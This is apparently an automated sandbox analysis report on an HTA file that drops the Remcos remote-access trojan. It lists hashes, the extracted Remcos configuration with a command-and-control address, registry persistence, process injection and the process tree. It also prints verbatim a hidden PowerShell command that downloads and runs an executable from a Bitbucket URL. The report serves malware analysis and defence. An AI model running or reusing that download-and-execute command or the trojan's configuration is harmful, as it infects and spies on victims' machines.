Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 12:33
Static task
static1
Behavioral task
behavioral1
Sample
1111.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1111.hta
Resource
win10v2004-20241007-en
General
-
Target
1111.hta
-
Size
2KB
-
MD5
91b57eb5e0925c7522374b0c64902dfd
-
SHA1
437da5eb27efeb38a9b7f804066205964a345a33
-
SHA256
e5f2879072cdd3e4905f5fa8017be818d2c61f718d0fd322196e9cd54062ba4a
-
SHA512
68dc36ae7ba35fb736677a7b179cfdea7b93ff7cb95ea27ffec9bde61cfc3358148cb612a33450b2b5ce452bf47077a8ed6e6d5b497e027b05415a89ec5b76f4
Malware Config
Extracted
https://bitbucket.org/docspaceplace/test2/downloads/1.exe
Extracted
remcos
Hello World!
46.175.167.116:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
Realtek Driver.exe
-
copy_folder
Realtek Audio
-
delete_file
false
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
true
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Realtek Audio-J15M0S
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Adds policy Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" Realtek Driver.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run EkXH.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" EkXH.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Realtek Driver.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 14 3932 powershell.exe 17 3932 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3932 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation EkXH.exe -
Executes dropped EXE 2 IoCs
pid Process 2584 EkXH.exe 1496 Realtek Driver.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" EkXH.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" EkXH.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" Realtek Driver.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" Realtek Driver.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek Audio-J15M0S = "\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio\\Realtek Driver.exe\"" iexplore.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 13 bitbucket.org 14 bitbucket.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1496 set thread context of 4316 1496 Realtek Driver.exe 99 PID 4316 set thread context of 1588 4316 iexplore.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Realtek Driver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EkXH.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ EkXH.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3932 powershell.exe 3932 powershell.exe 1496 Realtek Driver.exe 1496 Realtek Driver.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1496 Realtek Driver.exe 4316 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3932 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3212 wrote to memory of 3932 3212 mshta.exe 83 PID 3212 wrote to memory of 3932 3212 mshta.exe 83 PID 3212 wrote to memory of 3932 3212 mshta.exe 83 PID 3932 wrote to memory of 2584 3932 powershell.exe 94 PID 3932 wrote to memory of 2584 3932 powershell.exe 94 PID 3932 wrote to memory of 2584 3932 powershell.exe 94 PID 2584 wrote to memory of 1496 2584 EkXH.exe 98 PID 2584 wrote to memory of 1496 2584 EkXH.exe 98 PID 2584 wrote to memory of 1496 2584 EkXH.exe 98 PID 1496 wrote to memory of 4316 1496 Realtek Driver.exe 99 PID 1496 wrote to memory of 4316 1496 Realtek Driver.exe 99 PID 1496 wrote to memory of 4316 1496 Realtek Driver.exe 99 PID 1496 wrote to memory of 4316 1496 Realtek Driver.exe 99 PID 4316 wrote to memory of 1588 4316 iexplore.exe 100 PID 4316 wrote to memory of 1588 4316 iexplore.exe 100 PID 4316 wrote to memory of 1588 4316 iexplore.exe 100 PID 4316 wrote to memory of 1588 4316 iexplore.exe 100
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1111.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\EkXH.exe"C:\Users\Admin\AppData\Local\Temp\EkXH.exe" -install3⤵
- Adds policy Run key to start application
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Users\Admin\AppData\Roaming\Realtek Audio\Realtek Driver.exe"C:\Users\Admin\AppData\Roaming\Realtek Audio\Realtek Driver.exe"4⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1496 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\svchost.exesvchost.exe6⤵PID:1588
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
483KB
MD538c479083ba7387ebad73f3b67020eab
SHA148bbd0bf1d333293c22c96b7731ba54343d7f8fe
SHA256af9a6206a5f41bcdf8567adee799d8c5141da48776508c3c73617b2c140d84cb
SHA51223632f540c6e287a31828cdb7eac23ca5acd8653908f6211fadafb64734bafcecb34f7a27f3ee843dce054397b1ae5b723f467ebeca5d66d52320ba7909f7fbe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82